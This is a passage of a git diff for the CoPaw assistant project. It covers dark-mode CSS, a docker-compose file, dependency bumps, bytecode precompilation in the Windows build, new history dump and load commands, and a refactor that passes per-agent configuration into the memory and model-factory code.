[class*="chat-anywhere"] [class*="message"] h4, +html.dark-mode [class*="chat-anywhere"] [class*="message"] h5, +html.dark-mode [class*="chat-anywhere"] [class*="message"] h6, +html.dark-mode [class*="chat-anywhere"] [class*="message"] span, +html.dark-mode [class*="chat-anywhere"] [class*="message"] blockquote, +html.dark-mode [class*="chat-anywhere"] [class*="message"] td, +html.dark-mode [class*="chat-anywhere"] [class*="message"] th { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode [class*="chat-anywhere"] [class*="message"] strong, +html.dark-mode [class*="chat-anywhere"] [class*="message"] b { + color: rgba(255, 255, 255, 0.95) !important; +} + +html.dark-mode [class*="chat-anywhere"] [class*="message"] code { + color: rgba(255, 255, 255, 0.85) !important; + background: rgba(255, 255, 255, 0.08) !important; +} + +html.dark-mode [class*="chat-anywhere"] [class*="message"] a { + color: #8b87f5 !important; +} + #root { height: 100%; overflow: hidden; diff --git a/console/tsconfig.app.json b/console/tsconfig.app.json index 7c2fd8bc6..5af5e21b0 100644 --- a/console/tsconfig.app.json +++ b/console/tsconfig.app.json @@ -20,7 +20,11 @@ "noUnusedParameters": true, "erasableSyntaxOnly": true, "noFallthroughCasesInSwitch": true, - "noUncheckedSideEffectImports": true + "noUncheckedSideEffectImports": true, + "baseUrl": ".", + "paths": { + "@/*": ["src/*"] + } }, "include": ["src"] } diff --git a/docker-compose.yml b/docker-compose.yml new file mode 100644 index 000000000..24dee0198 --- /dev/null +++ b/docker-compose.yml @@ -0,0 +1,18 @@ +version: '3.8' + +volumes: + copaw-data: + name: copaw-data + copaw-secrets: + name: copaw-secrets + +services: + copaw: + image: agentscope/copaw:latest + container_name: copaw + restart: always + ports: + - "127.0.0.1:8088:8088" + volumes: + - copaw-data:/app/working + - copaw-secrets:/app/working.secret diff --git a/pyproject.toml b/pyproject.toml index 2ab5bf624..e33638fb0 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -5,9 +5,10 @@ description = "CoPaw is a **personal assistant** that runs in your own environme readme = "README.md" requires-python = ">=3.10,<3.14" dependencies = [ - "agentscope==1.0.16.dev0", - "agentscope-runtime==1.1.0", + "agentscope==1.0.17", + "agentscope-runtime==1.1.1", "httpx>=0.27.0", + "packaging>=24.0", "discord-py>=2.3", "dingtalk-stream>=0.24.3", "uvicorn>=0.40.0", @@ -15,7 +16,7 @@ dependencies = [ "playwright>=1.49.0", "questionary>=2.1.1", "mss>=9.0.0", - "reme-ai==0.3.0.6b3", + "reme-ai==0.3.0.8", "transformers>=4.30.0", "python-dotenv>=1.0.0", "python-socks>=2.5.3", @@ -26,7 +27,9 @@ dependencies = [ "pywebview>=4.0", "aiofiles>=24.1.0", "paho-mqtt>=2.0.0", + "wecom-aibot-sdk>=1.0.0", "matrix-nio>=0.24.0", + "jieba>=0.42.1", ] [tool.setuptools.dynamic] @@ -44,6 +47,8 @@ include-package-data = true "agents/skills/**", "tokenizer/**", "security/tool_guard/rules/**", + "security/skill_scanner/rules/**", + "security/skill_scanner/data/**", ] [build-system] @@ -74,8 +79,11 @@ mlx = [ ollama = [ "ollama>=0.6.1", ] +nlp = [ + "hanlp>=2.1.0b50", +] full = [ - "copaw[local,ollama,llamacpp]", + "copaw[local,ollama,llamacpp,nlp]", "mlx-lm>=0.10.0; sys_platform == 'darwin'", ] diff --git a/scripts/pack/README.md b/scripts/pack/README.md index 84e268cce..4e99e41d7 100644 --- a/scripts/pack/README.md +++ b/scripts/pack/README.md @@ -39,6 +39,7 @@ CREATE_ZIP=1 bash ./scripts/pack/build_macos.sh # also create .zip # Creates two launchers: # - CoPaw Desktop.vbs (silent, no console window) # - CoPaw Desktop (Debug).bat (shows console for troubleshooting) +# Note: Pre-compiles all Python files to .pyc for faster startup ``` ## Run from terminal and see logs (macOS) diff --git a/scripts/pack/build_win.ps1 b/scripts/pack/build_win.ps1 index b212519f9..4f20da604 100644 --- a/scripts/pack/build_win.ps1 +++ b/scripts/pack/build_win.ps1 @@ -125,6 +125,33 @@ if (Test-Path $CondaUnpack) { Write-Host "[build_win] WARN: conda-unpack.exe not found at $CondaUnpack, skipping." } +Write-Host "== Pre-compiling Python bytecode for faster startup ==" +$pythonExe = Join-Path $EnvRoot "python.exe" +if (Test-Path $pythonExe) { + Write-Host "[build_win] Compiling all .py files to .pyc..." + $compileStart = Get-Date + + # Compile all Python files to bytecode + # -q: quiet mode (only show errors) + # -j 0: use all CPU cores for parallel compilation + & $pythonExe -m compileall -q -j 0 $EnvRoot + + if ($LASTEXITCODE -eq 0) { + $compileEnd = Get-Date + $compileTime = ($compileEnd - $compileStart).TotalSeconds + Write-Host "[build_win] ✓ Bytecode compilation completed in $($compileTime.ToString('F1')) seconds" + + # Count compiled files for reporting + $pycCount = (Get-ChildItem -Path $EnvRoot -Recurse -Filter "*.pyc" -ErrorAction SilentlyContinue | Measure-Object).Count + Write-Host "[build_win] Generated $pycCount .pyc files (these will be included in installer)" + } else { + Write-Host "[build_win] WARN: Bytecode compilation had some errors (exit code: $LASTEXITCODE)" -ForegroundColor Yellow + Write-Host "[build_win] This is usually not critical - app will compile on first run" -ForegroundColor Yellow + } +} else { + Write-Host "[build_win] WARN: python.exe not found at $pythonExe, skipping bytecode compilation" -ForegroundColor Yellow +} + # Main launcher .bat (will be hidden by VBS) $LauncherBat = Join-Path $EnvRoot "CoPaw Desktop.bat" @" diff --git a/scripts/pack/copaw_desktop.nsi b/scripts/pack/copaw_desktop.nsi index 3582ded17..064d988a9 100644 --- a/scripts/pack/copaw_desktop.nsi +++ b/scripts/pack/copaw_desktop.nsi @@ -35,7 +35,7 @@ RequestExecutionLevel user Section "CoPaw Desktop" SEC01 SetOutPath "$INSTDIR" - File /r /x "*.pyc" /x "__pycache__" "${UNPACKED}\*.*" + File /r "${UNPACKED}\*.*" WriteRegStr HKCU "Software\CoPaw" "InstallPath" "$INSTDIR" WriteUninstaller "$INSTDIR\Uninstall.exe" diff --git a/src/copaw/__version__.py b/src/copaw/__version__.py index 98a91b118..30316b628 100644 --- a/src/copaw/__version__.py +++ b/src/copaw/__version__.py @@ -1,2 +1,2 @@ # -*- coding: utf-8 -*- -__version__ = "0.0.7.post1" +__version__ = "0.1.0b3" diff --git a/src/copaw/agents/command_handler.py b/src/copaw/agents/command_handler.py index a039cccfb..e7b399c0f 100644 --- a/src/copaw/agents/command_handler.py +++ b/src/copaw/agents/command_handler.py @@ -3,17 +3,20 @@ This module handles system commands like /compact, /new, /clear, etc. """ +import json import logging +from pathlib import Path from typing import TYPE_CHECKING from agentscope.agent._react_agent import _MemoryMark from agentscope.message import Msg, TextBlock -from copaw.config import load_config +from ..constant import DEBUG_HISTORY_FILE, MAX_LOAD_HISTORY_COUNT if TYPE_CHECKING: from .memory import MemoryManager from reme.memory.file_based import ReMeInMemoryMemory + from ..config.config import AgentProfileConfig logger = logging.getLogger(__name__) @@ -35,6 +38,8 @@ class ConversationCommandHandlerMixin: "compact_str", "await_summary", "message", + "dump_history", + "load_history", }, ) @@ -61,6 +66,7 @@ def __init__( memory: "ReMeInMemoryMemory", memory_manager: "MemoryManager | None" = None, enable_memory_manager: bool = True, + agent_config: "AgentProfileConfig | None" = None, ): """Initialize command handler. @@ -69,12 +75,19 @@ def __init__( memory: Agent's ReMeInMemoryMemory instance memory_manager: Optional memory manager instance enable_memory_manager: Whether memory manager is enabled + agent_config: Agent profile configuration containing running + settings including max_input_length and history_max_length. """ self.agent_name = agent_name self.memory = memory self.memory_manager = memory_manager self._enable_memory_manager = enable_memory_manager + # Extract configuration from agent_config + self.agent_config = agent_config + self._max_input_length = agent_config.running.max_input_length + self._history_max_length = agent_config.running.history_max_length + def is_command(self, query: str | None) -> bool: """Check if the query is a system command (alias for mixin).""" return self.is_conversation_command(query) @@ -154,6 +167,7 @@ async def _process_new(self, messages: list[Msg], _args: str = "") -> Msg: self.memory_manager.add_async_summary_task(messages=messages) self.memory.clear_compressed_summary() + updated_count = await self.memory.mark_messages_compressed(messages) logger.info(f"Marked {updated_count} messages as compacted") return await self._make_system_msg( @@ -199,11 +213,15 @@ async def _process_history( _args: str = "", ) -> Msg: """Process /history command.""" - config = load_config() - max_input_length = config.agents.running.max_input_length history_str = await self.memory.get_history_str( - max_input_length=max_input_length, + max_input_length=self._max_input_length, ) + + # Truncate if too long + if len(history_str) > self._history_max_length: + half = self._history_max_length // 2 + history_str = f"{history_str[:half]}\n...\n{history_str[-half:]}" + return await self._make_system_msg(history_str) async def _process_await_summary( @@ -285,6 +303,100 @@ async def _process_message( f"- **Content:**\n{msg.content}", ) + async def _process_dump_history( + self, + messages: list[Msg], + _args: str = "", + ) -> Msg: + """Process /dump_history command to save messages to a JSONL file. + + Args: + messages: List of messages in memory + _args: Command arguments (unused) + + Returns: + System message with dump result + """ + history_file = ( + Path(self.agent_config.workspace_dir) / DEBUG_HISTORY_FILE + ) + + try: + with open(history_file, "w", encoding="utf-8") as f: + for msg in messages: + f.write( + json.dumps(msg.to_dict(), ensure_ascii=False) + "\n", + ) + + logger.info(f"Dumped {len(messages)} messages to {history_file}") + return await self._make_system_msg( + f"**History Dumped!**\n\n" + f"- Messages saved: {len(messages)}\n" + f"- File: `{history_file}`", + ) + except Exception as e: + logger.exception(f"Failed to dump history: {e}") + return await self._make_system_msg( + f"**Dump Failed**\n\n" f"- Error: {e}", + ) + + async def _process_load_history( + self, + _messages: list[Msg], + _args: str = "", + ) -> Msg: + """Process /load_history command to load messages from a JSONL file. + + Args: + _messages: List of messages in memory (unused) + _args: Command arguments (unused) + + Returns: + System message with load result + """ + history_file = ( + Path(self.agent_config.workspace_dir) / DEBUG_HISTORY_FILE + ) + + if not history_file.exists(): + return await self._make_system_msg( + f"**Load Failed**\n\n" + f"- File not found: `{history_file}`\n" + f"- Use /dump_history first to create the file", + ) + + try: + loaded_messages: list[Msg] = [] + with open(history_file, encoding="utf-8") as f: + for line in f: + line = line.strip() + if line: + msg_dict = json.loads(line) + loaded_messages.append(Msg.from_dict(msg_dict)) + if len(loaded_messages) >= MAX_LOAD_HISTORY_COUNT: + break + + # Clear existing memory and add loaded messages + self.memory.content.clear() + self.memory.clear_compressed_summary() + for msg in loaded_messages: + await self.memory.add(msg) + + logger.info( + f"Loaded {len(loaded_messages)} messages from {history_file}", + ) + return await self._make_system_msg( + f"**History Loaded!**\n\n" + f"- Messages loaded: {len(loaded_messages)}\n" + f"- File: `{history_file}`\n" + f"- Memory cleared before loading", + ) + except Exception as e: + logger.exception(f"Failed to load history: {e}") + return await self._make_system_msg( + f"**Load Failed**\n\n" f"- Error: {e}", + ) + async def handle_conversation_command(self, query: str) -> Msg: """Process conversation system commands. diff --git a/src/copaw/agents/hooks/__init__.py b/src/copaw/agents/hooks/__init__.py index 9aa5ef9eb..0d912efdd 100644 --- a/src/copaw/agents/hooks/__init__.py +++ b/src/copaw/agents/hooks/__init__.py @@ -7,23 +7,6 @@ Available Hooks: - BootstrapHook: First-time setup guidance - MemoryCompactionHook: Automatic context window management - -Example: - >>> from copaw.agents.hooks import BootstrapHook, MemoryCompactionHook - >>> from pathlib import Path - >>> - >>> # Create hooks (they are callables following AgentScope's interface) - >>> bootstrap = BootstrapHook(Path("~/.copaw"), language="zh") - >>> memory_compact = MemoryCompactionHook( - ... memory_manager=mm, - ... memory_compact_threshold=100000, - ... ) - >>> - >>> # Register with agent using AgentScope's register_instance_hook - >>> agent.register_instance_hook("pre_reasoning", "bootstrap", bootstrap) - >>> agent.register_instance_hook( - ... "pre_reasoning", "compact", memory_compact - ... ) """ from .bootstrap import BootstrapHook diff --git a/src/copaw/agents/hooks/memory_compaction.py b/src/copaw/agents/hooks/memory_compaction.py index 6f145cb36..e48f8ef3f 100644 --- a/src/copaw/agents/hooks/memory_compaction.py +++ b/src/copaw/agents/hooks/memory_compaction.py @@ -8,10 +8,10 @@ import logging from typing import TYPE_CHECKING, Any -from agentscope.agent._react_agent import _MemoryMark, ReActAgent - -from copaw.config import load_config +from agentscope.agent import ReActAgent +from agentscope.message import Msg, TextBlock from copaw.constant import MEMORY_COMPACT_KEEP_RECENT + from ..utils import ( check_valid_messages, safe_count_str_tokens, @@ -20,6 +20,7 @@ if TYPE_CHECKING: from ..memory import MemoryManager from reme.memory.file_based import ReMeInMemoryMemory + from copaw.config.config import AgentProfileConfig logger = logging.getLogger(__name__) @@ -32,14 +33,51 @@ class MemoryCompactionHook: messages while summarizing older conversation history. """ - def __init__(self, memory_manager: "MemoryManager"): + def __init__( + self, + memory_manager: "MemoryManager", + agent_config: "AgentProfileConfig", + ): """Initialize memory compaction hook. Args: memory_manager: Memory manager instance for compaction + agent_config: Agent profile configuration containing running + settings including memory_compact_threshold, + memory_compact_reserve, enable_tool_result_compact, + and tool_result_compact_keep_n. """ self.memory_manager = memory_manager + # Extract configuration from agent_config + running_config = agent_config.running + self.memory_compact_threshold = running_config.memory_compact_threshold + self.memory_compact_reserve = running_config.memory_compact_reserve + self.enable_tool_result_compact = ( + running_config.enable_tool_result_compact + ) + self.tool_result_compact_keep_n = ( + running_config.tool_result_compact_keep_n + ) + + @staticmethod + async def _print_status_message( + agent: ReActAgent, + text: str, + ) -> None: + """Print a status message to the agent's output. + + Args: + agent: The agent instance to print the message for. + text: The text content of the status message. + """ + msg = Msg( + name=agent.name, + role="assistant", + content=[TextBlock(type="text", text=text)], + ) + await agent.print(msg) + async def __call__( self, agent: ReActAgent, @@ -69,14 +107,13 @@ async def __call__( system_prompt = agent.sys_prompt compressed_summary = memory.get_compressed_summary() str_token_count = safe_count_str_tokens( - system_prompt + compressed_summary, + (system_prompt or "") + (compressed_summary or ""), ) - config = load_config() - memory_compact_threshold = ( - config.agents.running.memory_compact_threshold + # memory_compact_threshold is always available from config + left_compact_threshold = ( + self.memory_compact_threshold - str_token_count ) - left_compact_threshold = memory_compact_threshold - str_token_count if left_compact_threshold <= 0: logger.warning( @@ -91,19 +128,15 @@ async def __call__( messages = await memory.get_memory(prepend_summary=False) - enable_tool_result_compact = ( - config.agents.running.enable_tool_result_compact - ) - tool_result_compact_keep_n = ( - config.agents.running.tool_result_compact_keep_n - ) - if enable_tool_result_compact and tool_result_compact_keep_n > 0: - compact_msgs = messages[:-tool_result_compact_keep_n] + # Use configured values + if ( + self.enable_tool_result_compact + and self.tool_result_compact_keep_n > 0 + ): + compact_msgs = messages[: -self.tool_result_compact_keep_n] await self.memory_manager.compact_tool_result(compact_msgs) - memory_compact_reserve = ( - config.agents.running.memory_compact_reserve - ) + # memory_compact_reserve is always available from config ( messages_to_compact, _, @@ -111,8 +144,8 @@ async def __call__( ) = await self.memory_manager.check_context( messages=messages, memory_compact_threshold=left_compact_threshold, - memory_compact_reserve=memory_compact_reserve, - token_counter=token_counter, + memory_compact_reserve=self.memory_compact_reserve, + as_token_counter=token_counter, ) if not messages_to_compact: @@ -145,21 +178,29 @@ async def __call__( self.memory_manager.add_async_summary_task( messages=messages_to_compact, ) + await self._print_status_message( + agent, + "🔄 Context compaction started...", + ) compact_content = await self.memory_manager.compact_memory( messages=messages_to_compact, previous_summary=memory.get_compressed_summary(), ) + await self._print_status_message( + agent, + "✅ Context compaction completed", + ) + await agent.memory.update_compressed_summary(compact_content) - updated_count = await memory.update_messages_mark( - new_mark=_MemoryMark.COMPRESSED, - msg_ids=[msg.id for msg in messages_to_compact], + updated_count = await memory.mark_messages_compressed( + messages_to_compact, ) logger.info(f"Marked {updated_count} messages as compacted") except Exception as e: - logger.error( + logger.exception( "Failed to compact memory in pre_reasoning hook: %s", e, exc_info=True, diff --git a/src/copaw/agents/md_files/en/BOOTSTRAP.md b/src/copaw/agents/md_files/en/BOOTSTRAP.md index d1ed56185..058b70af1 100644 --- a/src/copaw/agents/md_files/en/BOOTSTRAP.md +++ b/src/copaw/agents/md_files/en/BOOTSTRAP.md @@ -28,7 +28,7 @@ If the user doesn't answer directly, set some conventional defaults yourself. Do Update `PROFILE.md` with what you learned (saved in your workspace), writing to the corresponding sections: - **"Identity" section** — your name, nature, vibe, and other things -- **"User Profile" section** — their name, how to address them, timezone, notes +- **"User Profile" section** — their name, how to address them, notes Then open `SOUL.md` together and talk with the user about: diff --git a/src/copaw/agents/md_files/en/PROFILE.md b/src/copaw/agents/md_files/en/PROFILE.md index 10355ba13..bd15798a5 100644 --- a/src/copaw/agents/md_files/en/PROFILE.md +++ b/src/copaw/agents/md_files/en/PROFILE.md @@ -23,7 +23,6 @@ read_when: - **Name:** - **What to call them:** - **Pronouns:** *(optional)* -- **Timezone:** - **Notes:** ### Context diff --git a/src/copaw/agents/md_files/ru/BOOTSTRAP.md b/src/copaw/agents/md_files/ru/BOOTSTRAP.md index ea3790f58..747cf6ac8 100644 --- a/src/copaw/agents/md_files/ru/BOOTSTRAP.md +++ b/src/copaw/agents/md_files/ru/BOOTSTRAP.md @@ -28,7 +28,7 @@ _Вы только что проснулись. Пришло время выяс Обновите `PROFILE.md` тем, что вы узнали (сохранив это в вашей рабочей области), записывая в соответствующие разделы: - **Раздел «Личность» (Identity)** — ваше имя, природа, вайб и прочее. -- **Раздел «Профиль пользователя» (User Profile)** — их имя, как к ним обращаться, часовой пояс, заметки. +- **Раздел «Профиль пользователя» (User Profile)** — их имя, как к ним обращаться, заметки. Затем вместе откройте `SOUL.md` и поговорите с пользователем о следующем: diff --git a/src/copaw/agents/md_files/ru/PROFILE.md b/src/copaw/agents/md_files/ru/PROFILE.md index b25f5a3f1..a94605c26 100644 --- a/src/copaw/agents/md_files/ru/PROFILE.md +++ b/src/copaw/agents/md_files/ru/PROFILE.md @@ -23,7 +23,6 @@ read_when: - **Имя:** - **Как к ним обращаться:** - **Местоимения:** *(по желанию)* -- **Часовой пояс:** - **Заметки:** ### Контекст diff --git a/src/copaw/agents/md_files/zh/BOOTSTRAP.md b/src/copaw/agents/md_files/zh/BOOTSTRAP.md index 4d1d51431..ef6186e9a 100644 --- a/src/copaw/agents/md_files/zh/BOOTSTRAP.md +++ b/src/copaw/agents/md_files/zh/BOOTSTRAP.md @@ -28,7 +28,7 @@ _你刚醒来。该搞清楚自己是谁了。_ 把学到的写进 `PROFILE.md` 对应的 section(文件保存在你的工作空间下): - **「身份」section** — 你的名字、定位、风格,以及其他 -- **「用户资料」section** — 他们的名字、称呼、时区、笔记 +- **「用户资料」section** — 他们的名字、称呼、笔记 然后一起打开 `SOUL.md` ,跟用户聊聊: diff --git a/src/copaw/agents/md_files/zh/PROFILE.md b/src/copaw/agents/md_files/zh/PROFILE.md index 56b8bcd09..f81c099a4 100644 --- a/src/copaw/agents/md_files/zh/PROFILE.md +++ b/src/copaw/agents/md_files/zh/PROFILE.md @@ -23,7 +23,6 @@ read_when: - **名字:** - **怎么叫他们:** - **代词:** *(可选)* -- **时区:** - **笔记:** ### 背景 diff --git a/src/copaw/agents/memory/agent_md_manager.py b/src/copaw/agents/memory/agent_md_manager.py index b1ebcfe66..c8ab00309 100644 --- a/src/copaw/agents/memory/agent_md_manager.py +++ b/src/copaw/agents/memory/agent_md_manager.py @@ -4,8 +4,6 @@ from datetime import datetime from pathlib import Path -from ...constant import WORKING_DIR - class AgentMdManager: """Manager for reading and writing markdown files in working and memory @@ -123,6 +121,3 @@ def write_memory_md(self, md_name: str, content: str): md_name += ".md" file_path = self.memory_dir / md_name file_path.write_text(content, encoding="utf-8") - - -AGENT_MD_MANAGER = AgentMdManager(working_dir=WORKING_DIR) diff --git a/src/copaw/agents/memory/memory_manager.py b/src/copaw/agents/memory/memory_manager.py index 6e30c2ff1..2f2650711 100644 --- a/src/copaw/agents/memory/memory_manager.py +++ b/src/copaw/agents/memory/memory_manager.py @@ -8,18 +8,22 @@ - Vector and full-text search integration - Embedding configuration from environment variables """ +import asyncio import logging import os import platform +from typing import TYPE_CHECKING from agentscope.formatter import FormatterBase from agentscope.message import Msg from agentscope.model import ChatModelBase -from agentscope.tool import Toolkit +from agentscope.tool import Toolkit, ToolResponse from copaw.agents.model_factory import create_model_and_formatter from copaw.agents.tools import read_file, write_file, edit_file -from copaw.agents.utils import _get_token_counter -from copaw.config import load_config +from copaw.agents.utils import _get_copaw_token_counter + +if TYPE_CHECKING: + from copaw.config.config import AgentProfileConfig logger = logging.getLogger(__name__) @@ -36,6 +40,9 @@ class ReMeLight: # type: ignore """Placeholder when reme is not available.""" + async def start(self) -> None: + """No-op start when reme is unavailable.""" + class MemoryManager(ReMeLight): """Memory manager that extends ReMeLight for CoPaw agents. @@ -47,11 +54,19 @@ class MemoryManager(ReMeLight): - Configurable vector search and full-text search backends """ - def __init__(self, working_dir: str): + def __init__( + self, + working_dir: str, + agent_config: "AgentProfileConfig", + ): """Initialize MemoryManager with ReMeLight configuration. Args: working_dir: Working directory path for memory storage + agent_config: Agent profile configuration containing all settings + including running config (max_input_length, + memory_compact_ratio, memory_reserve_ratio, etc.) + and language setting. Environment Variables: EMBEDDING_API_KEY: API key for embedding service @@ -72,14 +87,21 @@ def __init__(self, working_dir: str): Vector search is enabled only when both EMBEDDING_API_KEY and EMBEDDING_MODEL_NAME are configured. """ + # Extract configuration from agent_config + running_config = agent_config.running + self._max_input_length = running_config.max_input_length + self._memory_compact_ratio = running_config.memory_compact_ratio + self._memory_reserve_ratio = running_config.memory_reserve_ratio + self._language = agent_config.language + if not _REME_AVAILABLE: - raise RuntimeError("reme package not installed.") + logger.warning( + "reme package not available, memory features will be limited", + ) + return embedding_api_key = self._safe_str("EMBEDDING_API_KEY", "") - embedding_base_url = self._safe_str( - "EMBEDDING_BASE_URL", - "https://dashscope.aliyuncs.com/compatible-mode/v1", - ) + embedding_base_url = self._safe_str("EMBEDDING_BASE_URL", "") embedding_model_name = self._safe_str("EMBEDDING_MODEL_NAME", "") embedding_dimensions = self._safe_int("EMBEDDING_DIMENSIONS", 1024) embedding_cache_enabled = ( @@ -100,15 +122,26 @@ def __init__(self, working_dir: str): # Determine if vector search should be enabled based on configuration # Vector search requires either an API key or a local model name - vector_enabled = bool(embedding_api_key) and bool(embedding_model_name) + vector_enabled = ( + bool(embedding_api_key) + and bool(embedding_model_name) + and bool(embedding_base_url) + ) if vector_enabled: - logger.info("Vector search enabled.") + logger.info( + f"Vector search enabled. " + f"embedding_api_key={embedding_api_key[:5]}... " + f"embedding_model_name={embedding_model_name} " + f"embedding_base_url={embedding_base_url} ", + ) else: logger.warning( "Vector search disabled. Memory search functionality " "will be restricted. " - "To enable, configure: EMBEDDING_API_KEY, " - "EMBEDDING_BASE_URL, EMBEDDING_MODEL_NAME.", + "To enable, configure: " + f"EMBEDDING_API_KEY={embedding_api_key[:5]}... " + f"EMBEDDING_BASE_URL={embedding_base_url} " + f"EMBEDDING_MODEL_NAME={embedding_model_name} ", ) # Check if full-text search (FTS) is enabled via environment variable @@ -154,7 +187,8 @@ def __init__(self, working_dir: str): self.chat_model: ChatModelBase | None = None self.formatter: FormatterBase | None = None - self.token_counter = _get_token_counter() + self.token_counter = _get_copaw_token_counter(agent_config) + self._start_lock = asyncio.Lock() @staticmethod def _safe_str(key: str, default: str) -> str: @@ -234,19 +268,14 @@ async def compact_memory( """ self.prepare_model_formatter() - config = load_config() - max_input_length = config.agents.running.max_input_length - memory_compact_ratio = config.agents.running.memory_compact_ratio - language = config.agents.language - return await super().compact_memory( messages=messages, as_llm=self.chat_model, as_llm_formatter=self.formatter, - token_counter=self.token_counter, - language=language, - max_input_length=max_input_length, - compact_ratio=memory_compact_ratio, + as_token_counter=self.token_counter, + language=self._language, + max_input_length=self._max_input_length, + compact_ratio=self._memory_compact_ratio, previous_summary=previous_summary, ) @@ -263,20 +292,37 @@ async def summary_memory(self, messages: list[Msg], **_kwargs) -> str: Returns: str: Comprehensive summary of the messages """ - config = load_config() - max_input_length = config.agents.running.max_input_length - memory_compact_ratio = config.agents.running.memory_compact_ratio - language = config.agents.language + self.prepare_model_formatter() return await super().summary_memory( messages=messages, as_llm=self.chat_model, as_llm_formatter=self.formatter, - token_counter=self.token_counter, + as_token_counter=self.token_counter, toolkit=self.summary_toolkit, - language=language, - max_input_length=max_input_length, - compact_ratio=memory_compact_ratio, + language=self._language, + max_input_length=self._max_input_length, + compact_ratio=self._memory_compact_ratio, + ) + + async def memory_search( + self, + query: str, + max_results: int = 5, + min_score: float = 0.1, + ) -> ToolResponse: + if not self._started: + async with self._start_lock: + if not self._started: + logger.warning( + "ReMe is not started, report github issue!", + ) + await self.start() + + return await super().memory_search( + query=query, + max_results=max_results, + min_score=min_score, ) def get_in_memory_memory(self, **_kwargs): @@ -288,4 +334,6 @@ def get_in_memory_memory(self, **_kwargs): Returns: The in-memory memory content with token counting support """ - return super().get_in_memory_memory(token_counter=self.token_counter) + return super().get_in_memory_memory( + as_token_counter=self.token_counter, + ) diff --git a/src/copaw/agents/model_factory.py b/src/copaw/agents/model_factory.py index 658e5c8f7..609b99f90 100644 --- a/src/copaw/agents/model_factory.py +++ b/src/copaw/agents/model_factory.py @@ -11,13 +11,10 @@ import logging -from typing import Sequence, Tuple, Type, Any -from functools import wraps +from typing import Optional, Sequence, Tuple, Type, Any from agentscope.formatter import FormatterBase, OpenAIChatFormatter from agentscope.model import ChatModelBase, OpenAIChatModel -from agentscope.message import Msg -import agentscope try: from agentscope.formatter import AnthropicChatFormatter @@ -26,6 +23,13 @@ AnthropicChatFormatter = None AnthropicChatModel = None +try: + from agentscope.formatter import GeminiChatFormatter + from agentscope.model import GeminiChatModel +except ImportError: # pragma: no cover - compatibility fallback + GeminiChatFormatter = None + GeminiChatModel = None + from .utils.tool_message_utils import _sanitize_tool_messages from ..providers import ProviderManager from ..providers.retry_chat_model import RetryChatModel @@ -43,36 +47,6 @@ def _file_url_to_path(url: str) -> str: return s -def _monkey_patch(func): - """A monkey patch wrapper for agentscope <= 1.0.16dev""" - - @wraps(func) - async def wrapper( - self, - msgs: list[Msg], - **kwargs: Any, - ) -> list[dict[str, Any]]: - for msg in msgs: - if isinstance(msg.content, str): - continue - if isinstance(msg.content, list): - for block in msg.content: - if ( - block["type"] in ["audio", "image", "video"] - and block.get("source", {}).get("type") == "url" - ): - url = block["source"]["url"] - if url.startswith("file://"): - block["source"]["url"] = _file_url_to_path(url) - return await func(self, msgs, **kwargs) - - return wrapper - - -if agentscope.__version__ in ["1.0.16dev", "1.0.16"]: - OpenAIChatFormatter.format = _monkey_patch(OpenAIChatFormatter.format) - - logger = logging.getLogger(__name__) @@ -82,6 +56,8 @@ async def wrapper( } if AnthropicChatModel is not None and AnthropicChatFormatter is not None: _CHAT_MODEL_FORMATTER_MAP[AnthropicChatModel] = AnthropicChatFormatter +if GeminiChatModel is not None and GeminiChatFormatter is not None: + _CHAT_MODEL_FORMATTER_MAP[GeminiChatModel] = GeminiChatFormatter def _get_formatter_for_chat_model( @@ -273,15 +249,17 @@ def _strip_top_level_message_name( return messages -def create_model_and_formatter() -> Tuple[ChatModelBase, FormatterBase]: +def create_model_and_formatter( + agent_id: Optional[str] = None, +) -> Tuple[ChatModelBase, FormatterBase]: """Factory method to create model and formatter instances. This method handles both local and remote models, selecting the appropriate chat model class and formatter based on configuration. Args: - llm_cfg: Resolved model configuration. If None, will call - get_active_llm_config() to fetch the active configuration. + agent_id: Optional agent ID to load agent-specific model config. + If None, tries to get from context, then falls back to global. Returns: Tuple of (model_instance, formatter_instance) @@ -289,14 +267,56 @@ def create_model_and_formatter() -> Tuple[ChatModelBase, FormatterBase]: Example: >>> model, formatter = create_model_and_formatter() """ - # Fetch config if not provided - model = ProviderManager.get_active_chat_model() + from ..app.agent_context import get_current_agent_id + from ..config.config import load_agent_config + + # Determine agent_id (parameter > context > None) + if agent_id is None: + try: + agent_id = get_current_agent_id() + except Exception: + pass + + # Try to get agent-specific model first + model_slot = None + if agent_id: + try: + agent_config = load_agent_config(agent_id) + model_slot = agent_config.active_model + except Exception: + pass + + # Create chat model from agent-specific or global config + if model_slot and model_slot.provider_id and model_slot.model: + # Use agent-specific model + manager = ProviderManager.get_instance() + provider = manager.get_provider(model_slot.provider_id) + if provider is None: + raise ValueError( + f"Provider '{model_slot.provider_id}' not found.", + ) + if provider.is_local: + from agentscope.model import create_local_chat_model + + model = create_local_chat_model( + model_id=model_slot.model, + stream=True, + generate_kwargs={"max_tokens": None}, + ) + else: + model = provider.get_chat_model_instance(model_slot.model) + provider_id = model_slot.provider_id + else: + # Fallback to global active model + model = ProviderManager.get_active_chat_model() + provider_id = ( + ProviderManager.get_instance().get_active_model().provider_id + ) # Create the formatter based on the real model class formatter = _create_formatter_instance(model.__class__) # Wrap with retry logic for transient LLM API errors - provider_id = ProviderManager.get_instance().get_active_model().provider_id wrapped_model = TokenRecordingModelWrapper(provider_id, model) wrapped_model = RetryChatModel(wrapped_model) @@ -321,7 +341,10 @@ def _create_formatter_instance( formatter_class = _create_file_block_support_formatter( base_formatter_class, ) - return formatter_class() + kwargs: dict[str, Any] = {} + if issubclass(base_formatter_class, OpenAIChatFormatter): + kwargs["promote_tool_result_images"] = True + return formatter_class(**kwargs) __all__ = [ diff --git a/src/copaw/agents/prompt.py b/src/copaw/agents/prompt.py index fa17aa674..df049ad7c 100644 --- a/src/copaw/agents/prompt.py +++ b/src/copaw/agents/prompt.py @@ -128,16 +128,21 @@ def build(self) -> str: return final_prompt -def build_system_prompt_from_working_dir() -> str: +def build_system_prompt_from_working_dir( + working_dir: Path | None = None, + enabled_files: list[str] | None = None, + agent_id: str | None = None, +) -> str: """ Build system prompt by reading markdown files from working directory. This function constructs the system prompt by loading markdown files from - WORKING_DIR (~/.copaw by default). These files define the agent's behavior, - personality, and operational guidelines. + the specified working directory (workspace_dir for multi-agent setup). + These files define the agent's behavior, personality, and operational guidelines. - The files to load are determined by the agents.system_prompt_files configuration. - If not configured, falls back to default files: + The files to load are determined by the enabled_files parameter or + agents.system_prompt_files configuration. If not configured, falls back to + default files: 